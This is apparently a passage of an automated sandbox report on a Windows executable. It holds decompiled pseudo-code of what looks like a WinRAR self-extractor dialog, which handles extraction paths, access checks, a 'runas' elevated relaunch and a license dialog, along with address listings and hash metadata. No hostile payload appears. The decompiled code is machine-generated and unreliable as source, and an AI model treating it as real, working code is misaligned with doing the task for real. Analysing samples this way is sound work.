											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E0020045D( *((intOrPtr*)(_t216 + 0x14)), E00206CAC, _t232);
											} else {
												E002066A2(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E00200697( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E00206CDB(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E00202E2C(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E00210E40(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E0020EA80(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00210E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E002047DA(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E0020EA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}










































          0x00206277
          0x00206279
          0x00206287
          0x0020628f
          0x00206293
          0x00206295
          0x00206297
          0x00206297
          0x0020629a
          0x002062a0
          0x002062a1
          0x002062a6
          0x002062b0
          0x00206297
          0x002062bf
          0x002062cf
          0x002062d8
          0x002062df
          0x002062e2
          0x002062e4
          0x002062e8
          0x002062ea
          0x002062ee
          0x002062f2
          0x002062f6
          0x002062f6
          0x00206302
          0x00206308
          0x00206309
          0x0020630e
          0x00206314
          0x00000000
          0x00000000
          0x0020631a
          0x0020631c
          0x00206320
          0x00206328
          0x00000000
          0x0020632e
          0x00206334
          0x00000000
          0x0020658a
          0x0020633e
          0x00206340
          0x00206344
          0x00206348
          0x00206348
          0x0020634a
          0x00206350
          0x00206354
          0x00206354
          0x00206356
          0x00206359
          0x0020635b
          0x0020635f
          0x00206366
          0x00206368
          0x0020637b
          0x00206380
          0x00206388
          0x0020638b
          0x0020638b
          0x0020638f
          0x00206392
          0x00206398
          0x0020639e
          0x002063a4
          0x002063a7
          0x002063aa
          0x00000000
          0x002063aa
          0x0020636a
          0x0020636a
          0x002063ae
          0x002063ae
          0x002063b3
          0x002063bd
          0x002063c3
          0x002063c7
          0x002063cd
          0x00206400
          0x00206400
          0x00206405
          0x00206416
          0x00206416
          0x0020641d
          0x00206407
          0x00206407
          0x0020640e
          0x00000000
          0x00206410
          0x00206410
          0x00206410
          0x0020640e
          0x00206425
          0x00206432
          0x00206434
          0x00206437
          0x0020643b
          0x0020643b
          0x0020643d
          0x00206441
          0x00206449
          0x00206449
          0x0020644e
          0x00000000
          0x00000000
          0x00206443
          0x00206443
          0x00206447
          0x00000000
          0x00000000
          0x00206447
          0x002063cf
          0x002063d2
          0x002063d6
          0x002063dc
          0x002063dd
          0x002063e2
          0x002063e4
          0x0020645f
          0x0020645f
          0x002063e6
          0x002063e6
          0x002063ea
          0x002063f5
          0x002063f5
          0x002063f9
          0x00000000
          0x002063ec
          0x002063ec
          0x002063f3
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x002063f3
          0x002063ea
          0x002063e4
          0x002063cd
          0x00000000
          0x00206450
          0x00206453
          0x00206455
          0x00206455
          0x0020645d
          0x00206464
          0x00206464
          0x0020646a
          0x0020646f
          0x00206471
          0x00206473
          0x00206475
          0x00206475
          0x00206475
          0x00206476
          0x00206478
          0x0020647a
          0x0020647c
          0x0020647e
          0x00206482
          0x00206482
          0x00206488
          0x0020648c
          0x00206490
          0x00206494
          0x00206496
          0x00206499
          0x0020649b
          0x0020649e
          0x002064a0
          0x002064a2
          0x002064a4
          0x002064a4
          0x002064a6
          0x002064ab
          0x002064ae
          0x002064c3
          0x002064b0
          0x002064b3
          0x002064b3
          0x002064cc
          0x002064ce
          0x002064d2
          0x002064d6
          0x002064d6
          0x002064dc
          0x002064dc
          0x002064e0
          0x002064e4
          0x002064e6
          0x00206641
          0x00000000
          0x002064ec
          0x002064ef
          0x002064f6
          0x002064fa
          0x002064fc
          0x00206568
          0x00206568
          0x00000000
          0x002064fe
          0x002064fe
          0x002064fe
          0x00206500
          0x00206503
          0x00206505
          0x0020650c
          0x00206527
          0x0020652a
          0x0020652f
          0x00206531
          0x00000000
          0x00000000
          0x0020650e
          0x00206511
          0x00206516
          0x00206518
          0x0020651e
          0x00206525
          0x00206537
          0x00206537
          0x0020653e
          0x00206544
          0x0020654b
          0x002065a2
          0x002065a7
          0x002065aa
          0x002065ac
          0x002065b2
          0x002065b9
          0x002065bd
          0x002065c5
          0x002065cb
          0x002065ce
          0x002065d2
          0x002065d9
          0x002065dd
          0x002065e4
          0x002065e6
          0x002065e8
          0x002065fe
          0x00206606
          0x0020660f
          0x00206613
          0x00206619
          0x00000000
          0x00206619
          0x00000000
          0x002065e6
          0x0020654d
          0x0020654d
          0x00206551
          0x00206597
          0x00206599
          0x0020656c
          0x0020656c
          0x0020656e
          0x00206574
          0x00206578
          0x0020657a
          0x00206580
          0x0020662b
          0x0020662d
          0x0020662f
          0x00206623
          0x00206623
          0x00206625
          0x00206645
          0x00206645
          0x0020664a
          0x00000000
          0x00000000
          0x00206631
          0x0020663a
          0x00206620
          0x00206620
          0x00000000
          0x00206620
          0x0020662f
          0x00206586
          0x00206586
          0x00000000
          0x00206586
          0x00206580
          0x00000000
          0x00000000
          0x00000000
          0x00206551
          0x0020654b
          0x00000000
          0x00000000
          0x00000000
          0x00206525
          0x00206518
          0x00000000
          0x00206553
          0x00206557
          0x0020655d
          0x0020655e
          0x00206562
          0x00206562
          0x00000000
          0x00206500
          0x002064fc
          0x00000000
          0x002064e6
          0x00206592
          0x00000000
          0x00206334
          0x00206328
          0x00000000
          0x00206320
          0x00206650
          0x00206658
          0x0020665b
          0x00206660
          0x0020666e
          0x00206673
          0x00206681
          0x0020669f

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 85c22a660dacd4786cc9ff9c50ac4d613525f9a375cac2a7ccb6c97971f60b49
          • Instruction ID: 84b78471a5fcb3c83acdd10f70421e7cf2707eaa491ee78a59d9e47bac674fa2
          • Opcode Fuzzy Hash: 85c22a660dacd4786cc9ff9c50ac4d613525f9a375cac2a7ccb6c97971f60b49
          • Instruction Fuzzy Hash: 2CD104B1A143428FDB14CF28C88975BBBE4BF95308F08056DE9449B683D774E978CB96
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020A5D1, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724COMMON
          Download Yara Rule
          C-Code - Quality: 80%
          			E0020A5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E0020D870(E002214F6, _t321);
				E0020D940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E001F12D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E0020C343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0x23b704;
						_t277 = 1;
						 *0x2375d8 = _t302;
						 *0x2375c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x245d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E002095F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0x239602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0x239602;
						if( *0x239602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E00209A32(_t308); // executed
						_push(0x2375e4);
						_push(0x2375e0);
						_push(0x24ce18);
						_push(_t302);
						 *0x2375d6 = 0; // executed
						_t114 = E00209EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x2375d1 = _t277;
						}
						__eflags =  *0x2375e4;
						if( *0x2375e4 > 0) {
							_push(7);
							_push( *0x2375e0);
							_push(_t302);
							E0020B4C7(_t299);
						}
						__eflags =  *0x24de20;
						if( *0x24de20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E001FDA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E001FDA42(_t286, 0xbe));
						}
						__eflags =  *0x2375e4;
						if( *0x2375e4 <= 0) {
							L103:
							__eflags =  *0x2375d6;
							if( *0x2375d6 != 0) {
								L114:
								__eflags =  *0x2395fc - 2;
								if( *0x2395fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0x2385f8;
								if( *0x2385f8 != 0) {
									E001F1294(_t302, 0x67, 0);
									E001F1294(_t302, 0x66, 0);
								}
								_t115 =  *0x2395fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x2375d7;
									if( *0x2375d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0x22df38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x2375d1;
								if( *0x2375d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E001FDA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x24ce0c;
							if( *0x24ce0c != 0) {
								goto L114;
							}
							__eflags =  *0x2395fc;
							if( *0x2395fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E001FFA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E001FFA89(__eflags, _t321 - 0x9688, E001FDA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0x24de20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x24de20;
								if( *0x24de20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0x2375e8; // 0x0
							E00208FE6(_t286, __eflags,  *0x230064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0x2375e0);
							_push(_t302); // executed
							E0020B4C7(_t299); // executed
							_t133 =  *0x24ce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x2395fc;
								if(__eflags == 0) {
									_t288 =  *0x2375e8; // 0x0
									E00208FE6(_t288, __eflags,  *0x230064,  *(_t321 + 0x14), _t133, 0, 0);
									L00212B4E( *0x24ce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0x2395fc - _t277;
							if( *0x2395fc == _t277) {
								L102:
								_push(_t277);
								_push( *0x2375e0);
								_push(_t302);
								E0020B4C7(_t299);
								goto L103;
							} else {
								 *0x22df3c(_t302);
								__eflags =  *0x2395fc - _t277;
								if( *0x2395fc == _t277) {
									goto L102;
								}
								__eflags =  *0x239601;
								if( *0x239601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x2375e0);
								_push(_t302);
								E0020B4C7(_t299);
								__eflags =  *0x24de18;
								if( *0x24de18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x230064, L"LICENSEDLG", 0, E0020A3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x2375d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x2375d0;
						if( *0x2375d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0x2375d0;
							if( *0x2375d0 == 0) {
								__eflags =  *0x2375d1;
								if( *0x2375d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0x2375cc;
									_t279 = _t152;
									if( *0x2375cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0x2222e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0x2385f8;
									if( *0x2385f8 == 0) {
										E001FFAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E0020C10F(_t285, _t321 - 0x1164, _t312);
										E001F3E41(_t321 - 0x4288, 0x880, E001FDA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E001FDA42(_t285, 0xba);
									}
									E0020C190(0, _t163);
									__eflags =  *0x239601;
									if( *0x239601 == 0) {
										E0020C7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E001F9D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E00209A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0x239601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0x2375dc = _t277;
													E001F12B2(_t302, 0x67, 0);
													E001F12B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E001FDA42(_t285, 0xe6)); // executed
													E001F12B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0x2222e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x2375e0);
													_push(_t302);
													E0020B4C7(_t300);
													_push(2);
													_push( *0x2375e0);
													_push(_t302);
													E0020B4C7(_t300);
													_push(0x24ce18);
													_push(_t302);
													 *0x24fe3c = _t277; // executed
													E0020C6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0x2375e0);
													 *0x24fe3c = 0;
													_push(_t302);
													E0020B4C7(_t300);
													__eflags =  *0x2375d7;
													if( *0x2375d7 == 0) {
														__eflags =  *0x2375cc;
														if( *0x2375cc == 0) {
															__eflags =  *0x24de2c;
															if( *0x24de2c == 0) {
																_push(4);
																_push( *0x2375e0);
																_push(_t302);
																E0020B4C7(_t300);
															}
														}
													}
													E001F1294(_t302, _t277, _t277);
													 *0x2375dc =  *0x2375dc & 0x00000000;
													__eflags =  *0x2375dc;
													_t182 =  *0x2375d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E001FDA42(_t285, 0x9a));
														E001F3E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E001F6E03(0x2300e0, _t277);
														E00209735(_t302, _t321 - 0x5688, E001FDA42(0x2300e0, 0x96), 0x30);
														 *0x2375cc =  *0x2375cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0x23b602;
												E001FE7AA(0x23b602, _t321 - 0x164, 0x80);
												_push(0x23a602);
												E001F3E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0x2375f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0x245d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E001FFAB1(0x245d0a, _t231, 0x2000);
													}
													E0020A24E(_t285, 0x249d0a, 7);
													E0020A24E(_t285, 0x24ad0a, 2);
													E0020A24E(_t285, 0x24bd0a, 0x10);
													 *0x24ce0b = _t277;
													_t285 = 0x24cd0a;
													E001FE90C(_t277, 0x24cd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0020EA80(_t238, 0x245d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E001FE957(_t321 - 0x164, 0x80);
												E001FE957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0x22df20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x24de2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E001F3E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E001F943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E001F9528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E001F946E(_t321 - 0x3188); // executed
											_t285 =  *0x239601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0x2375d7 = 1;
									L75:
									__eflags =  *0x2375cc;
									if( *0x2375cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x2375d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E001FDA42(_t285, 0x90));
									_t290 =  *0x2300e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E001FDA42(_t290, 0x96);
									E00209735(_t302, E001FDA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0x2375d1;
							if( *0x2375d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x24fe3c;
						if( *0x24fe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0x24fe3d;
							_t254 = _t149 & 0xffffff00 |  *0x24fe3d == 0x00000000;
							__eflags = _t254;
							 *0x24fe3d = _t254;
							_t255 = E001FDA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0x24fe3d;
								if( *0x24fe3d == 0) {
									goto L125;
								}
								__eflags =  *0x2375d7;
								if( *0x2375d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0x2375dc;
						 *0x2375d7 = 1;
						if( *0x2375dc == 0) {
							goto L12;
						}
						__eflags =  *0x2375cc;
						if( *0x2375cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E001F1217(_t302, E001FDA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}























































          0x0020a5d1
          0x0020a5d1
          0x0020a5d6
          0x0020a5e0
          0x0020a5e6
          0x0020a5ea
          0x0020a5ee
          0x0020a607
          0x0020a611
          0x0020a611
          0x0020a617
          0x0020acb3
          0x0020acb8
          0x0020acbf
          0x0020acc0
          0x0020acc6
          0x0020accc
          0x0020acce
          0x0020acd8
          0x0020acd8
          0x0020acde
          0x0020ace3
          0x0020ace5
          0x0020acf2
          0x0020acf2
          0x0020ad01
          0x0020ad10
          0x0020ad13
          0x0020ad25
          0x0020ad2d
          0x0020ad2f
          0x0020ad37
          0x0020ad39
          0x0020ad3c
          0x0020ad41
          0x0020ad43
          0x0020ad43
          0x0020ad4b
          0x0020ad52
          0x0020ad57
